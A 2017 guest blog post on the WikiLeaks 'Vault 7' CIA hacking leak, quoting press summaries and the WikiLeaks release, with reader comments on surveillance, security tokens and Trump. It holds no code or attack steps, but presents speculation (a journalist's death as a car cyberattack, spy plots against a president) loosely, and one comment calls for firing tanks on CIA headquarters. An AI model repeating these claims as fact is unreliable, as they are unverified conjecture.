I have zero sympathy for Donald Trump. But his world is now our world, and with both of his feet firmly planted in spook world, ours are too. He's in it to his neck, in fact, and what happens in that world will affect every one of us. He's so impossibly erratic, so impossibly unfit for his office, that everyone on the list above wants to remove him. Many of them are allied, but if they are, it's also only for convenience.

How do spooks remove the inconvenient and unfit? I leave that to your imagination;they have their ways. Whatever method they choose, however, it must be one without fingerprints - or more accurately, without their fingerprints - on it.

Which suggests two more questions. One, who will help them do it, take him down? Clearly, anyone and everyone on the list. Second, how do you bring down the president, using extra-electoral, extra-constitutional means, without bringing down the Republic? I have no answer for that.

Here's a brief look at "spook world" (my phrase, not the author's) from " The Fox Hunt " by John Sevigny:

Several times in my life – as a journalist and rambling, independent photographer - I've ended up rubbing shoulders with spooks. Long before that was a racist term, it was a catch-all to describe intelligence community people, counter intel types, and everyone working for or against them. I don't have any special insight into the current situation with Donald Trump and his battle with the IC as the intelligence community calls itself, but I can offer a few first hand observations about the labyrinth of shadows, light, reflections, paranoia, perceptions and misperceptions through which he finds himself wandering, blindly. More baffling and scary is the thought he may have no idea his ankles are already bound together in a cluster of quadruple gordian knots, the likes of which very few people ever escape.

Criminal underworlds, of which the Trump administration is just one, are terrifying and confusing places. They become far more complicated once they've been penetrated by authorities and faux-authorities who often represent competing interests, but are nearly always in it for themselves.

One big complication - and I've written about this before - is that you never know who's working for whom . Another problem is that the hierarchy of handlers, informants, assets and sources is never defined. People who believe, for example, they are CIA assets are really just being used by people who are perhaps not in the CIA at all but depend on controlling the dupe in question. It is very simple - and I have seen this happen - for the subject of an international investigation to claim that he is part of that operation. [emphasis added]

Which leads Sevigny to this observation about Trump, which I partially quoted above: "Donald Trump may be crazy, stupid, evil or all three but he knows the knives are being sharpened and there are now too many blades for him to count. The intel people are against him, as are the counter intel people. His phone conversations were almost certainly recorded by one organization or another, legal or quasi legal. His enemies include Republican lawmakers, journalists, the Clintons, the Bush family, Barack Obama, the ACLU, every living Democrat and even Rand Paul. Putin is not on his side - that's a business matter and not an alliance."

Again, this is not to defend Trump, or even to generate sympathy for him - I personally have none. It's to characterize where he is, and we are, at in this pivotal moment. Pivotal not for what they're doing, the broad intelligence community. But pivotal for what we're finding out, the extent and blatancy of the violations.

All of this creates an incredibly complex story, with only a tenth or less being covered by anything like the mainstream press. For example, the Trump-Putin tale is much more likely to be part of a much broader "international mobster" story, whose participants include not only Trump and Putin, but Wall Street (think HSBC) and major international banks, sovereign wealth funds, major hedge funds, venture capital (vulture capital) firms, international drug and other trafficking cartels, corrupt dictators and presidents around the world and much of the highest reaches of the "Davos crowd."

Much of the highest reaches of the .01 percent, in other words, all served, supported and "curated" by the various, often competing elements of the first-world military and intelligence communities. What a stew of competing and aligned interests, of marriages and divorces of convenience, all for the common currencies of money and power, all of them dealing in death .

What this new WikiLeaks revelation shows us is what just one arm of that community, the CIA, has been up to. Again, the breadth of the spying and hacking capability is beyond imagination. This is where we've come to as a nation.

What the CIA Is Up To - A Brief Sample

Now about those CIA spooks and their surprising capabilities. A number of other outlets have written up the story, but this from Zero Hedge has managed to capture the essence as well as the breadth in not too many words (emphasis mine throughout):

WikiLeaks has published what it claims is the largest ever release of confidential documents on the CIA It includes more than 8,000 documents as part of 'Vault 7', a series of leaks on the agency, which have allegedly emerged from the CIA's Center For Cyber Intelligence in Langley , and which can be seen on the org chart below, which Wikileaks also released : [org chart reproduced above]

A total of 8,761 documents have been published as part of 'Year Zero', the first in a series of leaks the whistleblower organization has dubbed 'Vault 7.' WikiLeaks said that 'Year Zero' revealed details of the CIA's "global covert hacking program," including "weaponized exploits" used against company products including " Apple's iPhone , Google's Android and Microsoft's Windows and even Samsung TVs , which are turned into covert microphones."

WikiLeaks tweeted the leak, which it claims came from a network inside the CIA's Center for Cyber Intelligence in Langley, Virginia.

Among the more notable disclosures which, if confirmed, " would rock the technology world ", the CIA had managed to bypass encryption on popular phone and messaging services such as Signal, WhatsApp and Telegram. According to the statement from WikiLeaks, government hackers can penetrate Android phones and collect "audio and message traffic before encryption is applied."

With respect to hacked devices like you smart phone, smart TV and computer, consider the concept of putting these devices in "fake-off" mode:

Among the various techniques profiled by WikiLeaks is "Weeping Angel", developed by the CIA's Embedded Devices Branch (EDB), which infests smart TVs , transforming them into covert microphones. After infestation, Weeping Angel places the target TV in a 'Fake-Off' mode , so that the owner falsely believes the TV is off when it is on. In 'Fake-Off' mode the TV operates as a bug, recording conversations in the room and sending them over the Internet to a covert CIA server.

As Kim Dotcom chimed in on Twitter, "CIA turns Smart TVs, iPhones, gaming consoles and many other consumer gadgets into open microphones" and added "CIA turned every Microsoft Windows PC in the world into spyware. Can activate backdoors on demand, including via Windows update "[.]

Do you still trust Windows Update?

About "Russia did it"

Adding to the "Russia did it" story, note this:

Another profound revelation is that the CIA can engage in "false flag" cyberattacks which portray Russia as the assailant . Discussing the CIA's Remote Devices Branch's UMBRAGE group, Wikileaks' source notes that it "collects and maintains a substantial library of attack techniques 'stolen' from malware produced in other states including the Russian Federation.["]

As Kim Dotcom summarizes this finding, " CIA uses techniques to make cyber attacks look like they originated from enemy state ."

This doesn't prove that Russia didn't do it ("it" meaning actually hacking the presidency for Trump, as opposed to providing much influence in that direction), but again, we're in spook world, with all the phrase implies. The CIA can clearly put anyone's fingerprints on any weapon they wish, and I can't imagine they're alone in that capability.

Hacking Presidential Devices?

If I were a president, I'd be concerned about this, from the WikiLeaks " Analysis " portion of the Press Release (emphasis added):

"Year Zero" documents show that the CIA breached the Obama administration's commitments [that the intelligence community would reveal to device manufacturers whatever vulnerabilities it discovered]. Many of the vulnerabilities used in the CIA's cyber arsenal are pervasive [across devices and device types] and some may already have been found by rival intelligence agencies or cyber criminals.

As an example, specific CIA malware revealed in "Year Zero" [that it] is able to penetrate, infest and control both the Android phone and iPhone software that runs or has run presidential Twitter accounts . The CIA attacks this software by using undisclosed security vulnerabilities ("zero days") possessed by the CIA[,] but if the CIA can hack these phones then so can everyone else who has obtained or discovered the vulnerability. As long as the CIA keeps these vulnerabilities concealed from Apple and Google (who make the phones) they will not be fixed, and the phones will remain hackable.

Does or did the CIA do this (hack presidential devices), or is it just capable of it? The second paragraph implies the latter. That's a discussion for another day, but I can say now that both Lawrence Wilkerson, aide to Colin Powell and a non-partisan (though an admitted Republican) expert in these matters, and William Binney, one of the triumvirate of major pre-Snowden leakers, think emphatically yes. (See Wilkerson's comments here . See Binney's comments here .)

Whether or not you believe Wilkerson and Binney, do you doubt that if our intelligence people can do something, they would balk at the deed itself, in this world of "collect it all "? If nothing else, imagine the power this kind of bugging would confer on those who do it.

The Breadth of the CIA Cyber-Hacking Scheme

But there is so much more in this Wikileaks release than suggested by the brief summary above. Here's a bullet-point overview of what we've learned so far, again via Zero Hedge:

Key Highlights from the Vault 7 release so far:

Also this scary possibility:

Journalist Michael Hastings, who in 2010 destroyed the career of General Stanley McChrystal and was hated by the military for it, was killed in 2013 in an inexplicably out-of-control car. This isn't to suggest the CIA, specifically, caused his death. It's to ask that, if these capabilities existed in 2013, what would prevent their use by elements of the military, which is, after all a death-delivery organization?

And lest you consider this last speculation just crazy talk, Richard Clarke (that Richard Clarke ) agrees: "Richard Clarke, the counterterrorism chief under both Bill Clinton and George W. Bush, told the Huffington Post that Hastings's crash looked consistent with a car cyber attack.'" Full and fascinating article here .

WiliLeaks Press Release

Here's what WikiLeaks itself says about this first document cache (again, emphasis mine):

Press Release

Today, Tuesday 7 March 2017, WikiLeaks begins its new series of leaks on the U.S. Central Intelligence Agency. Code-named "Vault 7" by WikiLeaks, it is the largest ever publication of confidential documents on the agency.

The first full part of the series, "Year Zero", comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA's Center for Cyber Intelligence in Langley, Virgina. It follows an introductory disclosure last month of CIA targeting French political parties and candidates in the lead up to the 2012 presidential election .

Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation. This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive.

"Year Zero" introduces the scope and direction of the CIA's global covert hacking program, its malware arsenal and dozens of "zero day" weaponized exploits against a wide range of U.S. and European company products, include Apple's iPhone, Google's Android and Microsoft's Windows and even Samsung TVs, which are turned into covert microphones.

Since 2001 the CIA has gained political and budgetary preeminence over the U.S. National Security Agency (NSA). The CIA found itself building not just its now infamous drone fleet, but a very different type of covert, globe-spanning force - its own substantial fleet of hackers. The agency's hacking division freed it from having to disclose its often controversial operations to the NSA (its primary bureaucratic rival) in order to draw on the NSA's hacking capacities.

By the end of 2016, the CIA's hacking division, which formally falls under the agency's Center for Cyber Intelligence (CCI), had over 5000 registered users and had produced more than a thousand hacking systems, trojans, viruses, and other "weaponized" malware. Such is the scale of the CIA's undertaking that by 2016, its hackers had utilized more code than that used to run Facebook. The CIA had created, in effect, its "own NSA" with even less accountability and without publicly answering the question as to whether such a massive budgetary spend on duplicating the capacities of a rival agency could be justified.

In a statement to WikiLeaks the source details policy questions that they say urgently need to be debated in public , including whether the CIA's hacking capabilities exceed its mandated powers and the problem of public oversight of the agency. The source wishes to initiate a public debate about the security, creation, use, proliferation and democratic control of cyberweapons.

Once a single cyber 'weapon' is 'loose' it can spread around the world in seconds, to be used by rival states, cyber mafia and teenage hackers alike.

Julian Assange, WikiLeaks editor stated that "There is an extreme proliferation risk in the development of cyber 'weapons'. Comparisons can be drawn between the uncontrolled proliferation of such 'weapons', which results from the inability to contain them combined with their high market value, and the global arms trade. But the significance of "Year Zero" goes well beyond the choice between cyberwar and cyberpeace. The disclosure is also exceptional from a political, legal and forensic perspective."

Wikileaks has carefully reviewed the "Year Zero" disclosure and published substantive CIA documentation while avoiding the distribution of 'armed' cyberweapons until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should analyzed, disarmed and published.

Wikileaks has also decided to redact and anonymise some identifying information in "Year Zero" for in depth analysis. These redactions include ten of thousands of CIA targets and attack machines throughout Latin America, Europe and the United States. While we are aware of the imperfect results of any approach chosen, we remain committed to our publishing model and note that the quantity of published pages in "Vault 7" part one ("Year Zero") already eclipses the total number of pages published over the first three years of the Edward Snowden NSA leaks.

Be sure to click through for the Analysis, Examples and FAQ sections as well.

"O brave new world," someone once wrote . Indeed. Brave new world, that only the brave can live in.

____

1 Mind you, the leakers may have had a comprehensive enough view to be making an accurate call. But the real point is there are no actors who will be allowed to make an independent assessment.

34 0 42 1 0 This entry was posted in Banana republic , Guest Post , Legal , Politics , Surveillance state , Technology and innovation on March 9, 2017 by Yves Smith .
Trade now with TradeStation – Highest rated for frequent traders
Subscribe to Post Comments 64 comments Code Name D , March 9, 2017 at 2:38 am

That's all I needed.
https://www.theguardian.com/us-news/2017/jan/10/fbi-chief-given-dossier-by-john-mccain-alleging-secret-trump-russia-contacts

Senator John McCain passed documents to the FBI director, James Comey, last month alleging secret contacts between the Trump campaign and Moscow and that Russian intelligence had personally compromising material on the president-elect himself.

The material, which has been seen by the Guardian, is a series of reports on Trump's relationship with Moscow. They were drawn up by a former western counter-intelligence official, now working as a private consultant. BuzzFeed on Tuesday published the documents, which it said were "unverified and potentially unverifiable".

The Guardian has not been able to confirm the veracity of the documents' contents,

Emphases mine. I had been sitting on this link trying to make sense of this part. Clearly, the Trump Whitehouse has some major leaks, which the MSM is exploiting. But the start of this article suggests that para-intelligence (is that a word? Eh, it is now) was the source of the allegedly damaging info.

This is no longer about the deep-state, but a rouge state, possibly guns for higher, each having fealty to specific political interests. The CIA arsenal wasn't leaked. It was delivered.

salvo , March 9, 2017 at 3:13 am

hmm.. as far as I can see, noone seems to care here in Germany anymore about being spied on by our US friends, apart from a few alternative sources which are being accused of spreading fake news, of being anti-american, russian trolls, the matter is widely ignored

visitor , March 9, 2017 at 3:40 am

I have read a few articles about the Vault 7 leak that typically raise a few alarms I would like to comment on.

1) The fact that the

CIA had managed to bypass encryption on popular phone and messaging services

does not mean that it has broken encryption, just that it has a way to install a program at a lower level, close to the operating system, that will read messages before they are encrypted and sent by the messaging app, or just after they have been decrypted by it.

As a side note: banks have now largely introduced two-factor authentication when accessing online services. One enters username (or account number) and password; the bank site returns a code; the user must then enter this code into a smartphone app or a tiny specialized device, which computes and returns a value out of it; the user enters this last value into the entry form as a throw-away additional password, and gains access to the bank website.

I have always refused to use such methods on a smartphone and insist on getting the specialized "single-use password computer", precisely because the smartphone platform can be subverted.

2) The fact that

"Weeping Angel", developed by the CIA's Embedded Devices Branch (EDB), [ ] infests smart TVs, transforming them into covert microphones.

is possible largely because smart TVs are designed by their manufacturers to serve as spying devices. "Weeping Angel" is not some kind of virus that turns normal devices into zombies, but a tool to take control of existing zombie devices.

The fact that smart TVs from Vizio , Samsung or LG constitute an outrageous intrusion into the privacy of their owners has been a known topic for years already.

3) The

CIA [ ] also looking at infecting the vehicle control systems used by modern cars and trucks

is not a "scary possibility" either; various demonstrations of such feats on Tesla , Nissan , or Chrysler vehicles have been demonstrated in the past few years.

And the consequences have already been suggested (killing people by disabling their car controls on the highway for instance).

My take on this is that we should seriously look askance not just at the shenanigans of the CIA, but at the entire "innovative technology" that is imposed upon (computerized cars) or joyfully adopted by (smartphones) consumers. Of course, most NC readers are aware of the pitfalls already, but alas not the majority of the population.

4) Finally this:

He's so impossibly erratic, so impossibly unfit for his office,

Trump is arguably unfit for office, does not have a clue about many things (such as foreign relations), but by taxing him of being "erratic" Gaius Publius shows that he still does not "get" the Donald.

Trump has a completely different modus operandi than career politicians, formed by his experience as a real-estate mogul and media star. His world has been one where one makes outrageous offers to try anchoring the negotiation before reducing one's claims - even significantly, or abruptly exiting just before an agreement to strike a deal with another party that has been lured to concessions through negotiations with the first one. NC once included a video of Trump doing an interactive A/B testing of his slogans during a campaign meeting; while changing one's slogans on the spot might seem "erratic", it is actually a very systematic market probing technique.

So stop asserting that Trump is "unpredictable" or "irrational"; this is underestimating him (a dangerous fault), as he is very consistent, though in an uncommon fashion amongst political pundits.

Yves Smith Post author , March 9, 2017 at 5:53 am

While I agree that it's worth pointing out that the CIA has not broken any of the major encryption tools, even Snowden regards being able to circumvent them as worse, since people using encryption are presumably those who feel particularly at risk and will get a false sense of security and say things or keep data on their devices that they never never would if they thought they were insecure.

Re Gaius on Trump, I agree the lady doth protest too much. But I said repeatedly that Trump would not want to be President if he understood the job. It is not like being the CEO of a private company. Trump has vastly more control over his smaller terrain in his past life than he does as President.

And Trump is no longer campaigning. No more a/b testing.

The fact is that he still does not have effective control of the Executive branch. He has lots of open positions in the political appointee slots (largely due to not having even submitted candidates!) plus has rebellion in some organizations (like folks in the EPA storing data outside the agency to prevent its destruction).

You cannot pretend that Trump's former MO is working at all well for him. And he isn't showing an ability to adapt or learn (not surprising at his age). For instance, he should have figured out by now that DC is run by lawyers, yet his team has hardly any on it. This is continuing to be a source of major self inflicted wounds.

His erraticness may be keeping his opponents off base, but it is also keeping him from advancing any of his goals.

visitor , March 9, 2017 at 6:59 am

I believe we are in agreement.

Yes, not breaking encryption is devious, as it gives a false sense of security - this is precisely why I refuse to use those supposedly secure e-banking login apps on smartphones whose system software can be subverted, and prefer those non-connected, non-reprogrammable, special-purpose password generating devices.

As for Trump being incompetent for his job, and his skills in wheeling-dealing do not carrying over usefully to conducting high political offices, that much is clear. But he is not "erratic", rather he is out of place and out of his depth.

RBHoughton , March 9, 2017 at 9:00 pm

I am writing this in the shower with a paper bag over my head and my iPhone in the microwave.

I have for years had a password-protected document on computer with all my important numbers and passwords. I have today deleted that document and reverted to a paper record.

Ivy , March 9, 2017 at 10:09 am

Please tell readers more about the following for our benefit:

"single-use password computer"

visitor , March 9, 2017 at 11:34 am

That is an example of the sort of thing I am talking about.

PhilM , March 9, 2017 at 11:35 am

I think he means a machine dedicated to high-security operations like anything financial or bill-pay. Something that is not exposed to email or web-browsing operations that happen on a casual-use computer that can easily compromise. That's not a bad way to go; it's cheaper in terms of time than the labor-intensive approaches I use, but those are a hobby more than anything else. It depends on how much you have at stake if they get your bank account or brokerage service password.

I take a few basic security measures, which would not impress the IT crowd I hang out with elsewhere, but at least would not make me a laughingstock. I run Linux and use only open-source software; run ad-blockers and script blockers; confine risky operations, which means any non-corporate or non-mainstream website to a virtual machine that is reset after each use; use separate browsers with different cookie storage policies and different accounts for different purposes. I keep a well-maintained pfSense router with a proxy server and an intrusion detection system, allowing me to segregate my secure network, home servers, guest networks, audiovisual streaming and entertainment devices, and IoT devices each on their own VLANs with appropriate ACLs between them. No device on the more-secured network is allowed out to any port without permission, and similar rules are there for the IoT devices, and the VoIP tools.

The hardware to do all of that costs at least $700, but the real expense is in the time to learn the systems properly. Of course if you use Linux, you could save that on software in a year if you are too cheap to send a contribution to the developers.

It's not perfect, because I still have computers turned on :) , but I feel a bit safer this way.

That said, absolutely nothing that I have here would last 30 milliseconds against anything the "hats" could use, if they wanted in. It would be over before it began. If I had anything to hide, really, I would have something to fear; so guess I'm OK.

jrs , March 9, 2017 at 2:36 pm

open source software often has a lot of bugs to be exploioted. Wouldn't it be easier to just do banking in person?

visitor , March 9, 2017 at 2:45 pm

Banks discourage that by

a) charging extortionate fees for "in-person" operations at the counter;

b) closing subsidiaries, thus making it tedious and time-consuming to visit a branch to perform banking operations in person;

c) eliminating the possibility to perform some or even all usual operations in any other form than online (see the advent of "Internet only" banks).

In theoretical terms, all this is called "nudging".

cfraenkel , March 9, 2017 at 12:07 pm

They're key fobs handed to you by your IT dept. The code displayed changes every couple of minutes. The plus is there's nothing sent over the air. The minus is the fobs are subject to theft, and are only good for connecting to 'home'. And since they have a cost, and need to be physically handed to you, they're not good fit for most two factor login applications (ie logging into your bank account).

see https://en.wikipedia.org/wiki/RSA_SecurID

meme , March 9, 2017 at 3:53 am

I watched (fast forwarded through, really) Morning Joe yesterday to see what they would have to say about Wikileaks. The show mostly revolved around the health care bill and Trump's lying and tweeting about Obama wiretapping him. They gave Tim Kaine plenty of time to discuss his recent trip to London talking to "some of our allies there" saying that they are concerned that "all the intelligence agencies" say the Rooskies "cyber hacked" our election, and since it looks like we aren't doing anything when we are attacked, they KNOW we won't do anything when they are attacked. (more red baiting)

The only two mentions I saw was about Wikileaks were, first, a question asked of David Cohen, ex Deputy Director of the CIA, who refused to confirm the Wikileaks were authentic, saying whatever tools and techniques the CIA had were used against foreign persons overseas, so there is no reason to worry that your TV is looking at you. And second, Senator Tom Cotton, who didn't want to comment on the contents of Wikileaks, only saying that the CIA is a foreign intelligence service, collecting evidence on foreign targets to keep our country safe, and it does not do intelligence work domestically.

So that appears to be their story, the CIA doesn't spy on us, and they are sticking with it, probably hoping the whole Wikileaks thing just cycles out of the news.

Direction , March 9, 2017 at 4:23 am

Thanks for mentioning Hastings. His death has always been more than suspicious.

skippy , March 9, 2017 at 5:46 am

Elite risk management reduction tool goes walkabout inverting its potential ..

disheveled . love it when a plan comes together ..

james wordsworth , March 9, 2017 at 5:50 am

The unwillingness of the main stream media (so far) to really cover the Wikileaks reveal is perhaps the bigger story. This should be ongoing front page stuff .. but it is not.

As for using ZeroHedge as a source for anything, can we give that a rest. That site has become a cesspool of insanity. It used to have some good stuff. Now it is just unreadable. SAD

And yes I know the hypocrisy of slamming ZH and the MSM at the same time we live in interesting times.

Yves Smith Post author , March 9, 2017 at 7:52 am

Your remarks on ZH are an ad hominem attack and therefore a violation of site policies. The onus is on you to say what ZH got wrong and not engage in an ungrounded smear. The mainstream media often cites ZH.

NC more than just about any other finance site is loath to link to ZH precisely because it is off base or hyperventilating a not acceptably high percent of the time, and is generally wrong about the Fed (as in governance and how money works). We don't want to encourage readers to see it as reliable. However, it is good on trader gossip and mining Bloomberg data.

And I read through its summary of the Wikileaks material as used by Gaius and there was nothing wrong with it. It was careful about attributing certain claims to Wikileaks as opposed to depicting them as true.

3urypteris , March 9, 2017 at 12:14 pm

My rules for reading ZH:
1- Skip every article with no picture
2- Skip every article where the picture is a graph
3- Skip every article where the picture is of a single person's face
4- Skip every afticle where the picture is a cartoon
5- Skip every article about gold, BitCoin, or high-frequency trading
6- Skip all the "Guest Posts"
7- ALWAYS click through to the source
8- NEVER read the comments

It is in my opinion a very high noise-to-signal source, but there is some there there.

sunny129 , March 9, 2017 at 7:20 pm

Finding the TRUTH is NOT that easy.

Discerning a 'news from noise' is NEVER that easy b/c it is an art, developed by years of shifting through ever increasing 'DATA information' load. This again has to be filtered and tested against one's own 'critical' thinking or reasoning! You have to give ZH, deserved credit, when they are right!

There is no longer a Black or white there, even at ZH! But it is one of the few, willing to challenge the main stream narrative 'kool aid'

TheCatSaid , March 9, 2017 at 6:14 am

In addition to the "para-intelligence" community (hat tip Code named D) there are multiple enterprises with unique areas of expertise that interface closely with the CIA The long-exposed operations, which include entrapment and blackmailing of key actors to guarantee complicity, "loyalty" and/or sealed lips, infect businesses, NGOs, law enforcement agencies, judges, politicians, and other government agencies. Equal opportunity employment for those with strong stomachs and a weak moral compass.

Romancing The Loan , March 9, 2017 at 8:43 am

Yes I can't remember where I read it but it was a tale passed around supposedly by an FBI guy that had, along with his colleagues, the job of vetting candidates for political office. They'd do their background research and pass on either a thick or thin folder full of all the compromising dirt on each potential appointee. Over time he said he was perturbed to notice a persistent pattern where the thickest folders were always the ones who got in.

nobody , March 9, 2017 at 10:10 am

Michael Hudson :

I learned this when I was in my 20s. The Catholic Church was funding my early critique of American foreign aid as being imperialist. I asked whether they thought I should go into politics. They said, "No, you'd never make it". And I said, "Why?" and they said, "Well, nobody has a police record or any other dirt on you." I asked what they meant. They said, "Unless they have something over you to blackmail you with, you're not going to be able to get campaign funding. Because they believe that you might do something surprising," in other words, something they haven't asked you to do. So basically throughout politics, on both sides of the spectrum, voters have candidates who are funded by backers who have enough over them that they can always blackmail.

craazyboy , March 9, 2017 at 8:20 am

I find the notion that my consumer electronics may be CIA microphones somewhat irritating, but my imagination quickly runs off to far worse scenarios. (although the popular phase, "You're tax dollars at work." keeps running thru my head like a earworm. And whenever I hear "conservatives" speak of their desire for "small government", usually when topics of health care, Medicare and social security come up, I can only manage a snort of incredulousness anymore)

One being malware penetrating our nuke power plants and shutting down the cooling system. Then the reactor slowly overheats over the next 3 days, goes critical, and blows the surrounding area to high heaven. We have plants all around the coast of the country and also around the Great Lakes Region – our largest fresh water store in a drought threatened future.

Then the same happening in our offensive nuke missile systems.

Some other inconvenient truths – the stuxnet virus has been redesigned. Kaspersky – premier anti malware software maker – had a variant on their corporate network for months before finally discovering it. What chance have we?

In China, hacking is becoming a consumer service industry. There are companies building high power data centers with a host of hacking tools. Anyone, including high school script kiddies, can rent time to use the sophisticated hacking tools, web search bots, and whatever, all hosted on powerful servers with high speed internet bandwidth.

Being a bit "spooked" by all this, I began to worry about my humble home computer and decided to research whatever products I could get to at least ward off annoying vandalism. Among other things, I did sign up for a VPN service. I'm looking at the control app for my VPN connection here and I see that with a simple checkbox mouse click I can make my IP address appear to be located in my choice of 40 some countries around the world. Romania is on the list!

flora , March 9, 2017 at 11:11 am

"my consumer electronics may be CIA microphones "

I haven't tested this, so can't confirm it works, but it sounds reasonable.
http://www.komando.com/tips/390304/secure-your-webcam-and-microphone-from-hackers

craazyboy , March 9, 2017 at 12:40 pm

Actually, I very much doubt that does work. The mic "pickup" would feed its analog output to a DAC (digital to analog converter) which would convert the signal to digital. This then goes to something similar to a virtual com port in the operating system. Here is where a malware program would pick it up and either create a audio file to be sent to an internet address, or stream it directly there.

The article is just plugging in a microphone at the output jack. The malware got the data long before it goes thru another DAC and analog amp to get to the speakers or output jack.

craazyboy , March 9, 2017 at 12:46 pm

s/b "plugging in a earbud at the output jack". They're confusing me too.

flora , March 9, 2017 at 2:43 pm

ah. thanks for vetting.

Stephen Gardner , March 9, 2017 at 2:53 pm

It's actually a input/output jack or, if you will, a mic/headphone jack.

Stephen Gardner , March 9, 2017 at 2:52 pm

It depends on how it is hooked up internally. Old fashioned amateur radio headphones would disable the speakers when plugged in because the physical insertion of the plug pushed open the connection to the speakers. The jack that you plug the ear buds into might do the same, disconnecting the path between the built-in microphone and the ADC (actually it is an ADC not a DAC). The only way to know is to take it apart and see how it is connected.

Pat , March 9, 2017 at 8:27 am

The CIA is not allowed to operate in the US is also the panacea for the public. And some are buying it. Along with everyone knows they can do this is fueling the NOTHING to see here keep walking weak practically non existent coverage.

Eureka Springs , March 9, 2017 at 8:31 am

At what point do people quit negotiating in terrorism and errorism? For this is what the police, the very State itself has long been. Far beyond being illegitimate, illegal, immoral, this is a clear and ever present danger to not just it's own people, but the rule of law itself. Blanket statements like we all know this just makes the dangerously absurd normal I'll never understand that part of human nature. But hey, the TSA literally just keeps probing further each and every year. Bend over!

Trump may not be the one for the task but we the people desperately need people 'unfit', for it is the many fit who brought us to this point. His unfit nature is as refreshing on these matters in its chaotic honest disbelief as Snowden and Wiki revelations. Refreshing because it's all we've got. One doesn't have to like Trump to still see missed opportunity so many should be telling him he could be the greatest pres ever if (for two examples) he fought tirelessly for single payer and to bring down this police state rather than the EPA or public education.

This cannot stand on so many levels. Not only is the fourth amendment rendered utterly void, but even if it weren't it falls far short of the protections we deserve.

No enemy could possibly be as bad as who we are and what we allow/do among ourselves. If an election can be hacked (not saying it was by Russia).. as these and other files prove anything can and will be hacked then our system is to blame, not someone else.

What amazes me is that the spooks haven't manufactured proof needed to take Trump out of office Bonfire of The Vanities style. I'd like to think the people have moved beyond the point they would believe manufactured evidence but the Russia thing proves otherwise.

These people foment world war while probing our every move and we do nothing!

If we wait for someone fit nothing will ever change because we wait for the police/media/oligarch state to tell us who is fit.

Anon , March 9, 2017 at 2:40 pm

being "unfit" does not automatically make someone a savior.

Stephen Gardner , March 9, 2017 at 3:05 pm

But being fit by the standards of our ruling class, the "real owners" as Carlin called them is, in my book, an automatic proof that they are up to no good. Trump is not my cup of tea as a president but no one we have had in a while wasn't clearly compromised by those who fund them. Did you ever wonder why we have never had a president or even a powerful member of congress that was not totally in the tank for that little country on the Eastern Mediterranean? Or the Gulf Monarchies? Do you think that is by accident? Do you think money isn't involved? Talk about hacked elections! We should be so lucky as to have ONLY Russians attempting to affect our elections. Money is what hacks US elections and never forget that. To me it is laughable to discuss hacking the elections without discussing the real way our "democracy" is subverted–money not document leaks or voting machine hacks. It's money.

Why isn't Saudi Arabia on Trump's list? Iran that has never been involved in a terrorist act on US soil is but not Saudi Arabia? How many 911 hijackers came from Iran? If anything saves Trump from destruction by the real owners of our democracy it is his devotion to the aforementioned countries.

Allegorio , March 9, 2017 at 4:00 pm

The point again is not to remove him from office but to control him. With Trump's past you better believe the surveillance state has more than enough to remove him from office. Notice the change in his rhetoric since inauguration? More and more he is towing the establishment Republican line. Of course this depends on whether you believe Trump is a break with the past or just the best liar out there. A very unpopular establishment would be clever in promoting their agent by pretending to be against him.

Anyone who still believes that the US is a democratic republic and not a mafia state needs to stick their heads deeper into the sands. When will the low information voters and police forces on whom a real revolution depends realize this is anyone's guess. The day is getting closer especially for the younger generation. The meme among the masses is that government has always been corrupt and that this is nothing new. I do believe the level of immorality among the credentialed classes is indeed very new and has become the new normal. Generations of every man for himself capitalist philosophy undermining any sense of morality or community has finally done its work.

HBE , March 9, 2017 at 8:47 am

Go take a jaunt over to huffpo, at the time of this post there was not a single mention of vault 7 on the front page. Just a long series of anti trump administration articles.

Glad to know for sure who the true warmongers were all along.

Arizona Slim , March 9, 2017 at 8:50 am

We need another Church Commission.

Eureka Springs , March 9, 2017 at 8:59 am

No.. The Church commission was a sweep it under the rug operation. It got us FISA courts. More carte blanche secrecy, not less. The commission nor the rest of the system didn't even hold violators of the time accountable.

We have files like Vault 7. Commissions rarely get in secret what we have right here before our eyes.

Arizona Slim , March 9, 2017 at 1:31 pm

Well, how about a Truth and Reconciliation Commission?

Foppe , March 9, 2017 at 1:55 pm

Cute but the ANC lost the war by acceding to WTO entry (which "forbade" distributive politics, land/resource redistribution, nationalizations, etc.).

River , March 9, 2017 at 10:59 am

Need Langley surrounded and fired upon by tanks at this point.

Err on the side of caution.

DJG , March 9, 2017 at 12:49 pm

River: Interesting historic parallel? I believe that the Ottomans got rid of the Janissaries that way, after the Janissaries had become a state within a state, by using cannons on their HQ

From Wiki entry, Janissaries:

The corps was abolished by Sultan Mahmud II in 1826 in the Auspicious Incident in which 6,000 or more were executed.[8]

polecat , March 9, 2017 at 12:53 pm

"Nuke it from orbit it's the only way to be sure . "

knowbuddhau , March 9, 2017 at 9:01 am

Took less than a minute to download the 513.33MB file. The passphrase is what JFK said he'd like to do to CIA: SplinterItIntoAThousandPiecesAndScatterItIntoTheWinds.

"The illegal we do immediately; the unconstitutional takes a little longer." Henry Kissinger, 1975.

Stormcrow , March 9, 2017 at 9:35 am

Here is Raimondo's take:
Spygate
http://original.antiwar.com/justin/2017/03/07/spygate-americas-political-police-vs-donald-j-trump/

The campaign to frame up and discredit Trump and his associates is characteristic of how a police state routinely operates. A national security apparatus that vacuums up all our communications and stores them for later retrieval has been utilized by political operatives to go after their enemies – and not even the President of the United States is immune. This is something that one might expect to occur in, say, Turkey, or China: that it is happening here, to the cheers of much of the media and the Democratic party, is beyond frightening.

The irony is that the existence of this dangerous apparatus – which civil libertarians have warned could and probably would be used for political purposes – has been hailed by Trump and his team as a necessary and proper function of government. Indeed, Trump has called for the execution of the person who revealed the existence of this sinister engine of oppression – Edward Snowden. Absent Snowden's revelations, we would still be in the dark as to the existence and vast scope of the NSA's surveillance.

And now the monster Trump embraced in the name of "national security" has come back to bite him.

We hear all the time that what's needed is an open and impartial "investigation" of Trump's alleged "ties" to Russia. This is dangerous nonsense: does every wild-eyed accusation from embittered losers deserve a congressional committee armed with subpoena power bent on conducting an inquisition? Certainly not.

